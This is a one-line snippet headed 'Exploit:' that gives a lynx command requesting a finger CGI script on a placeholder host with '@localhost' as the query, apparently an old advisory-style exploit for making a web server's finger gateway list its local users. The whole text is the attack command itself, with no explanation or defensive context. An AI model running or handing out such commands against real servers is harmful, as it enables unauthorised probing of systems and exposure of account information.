Exploit:

  lynx http://www.host.com/cgi-bin/finger?@localhost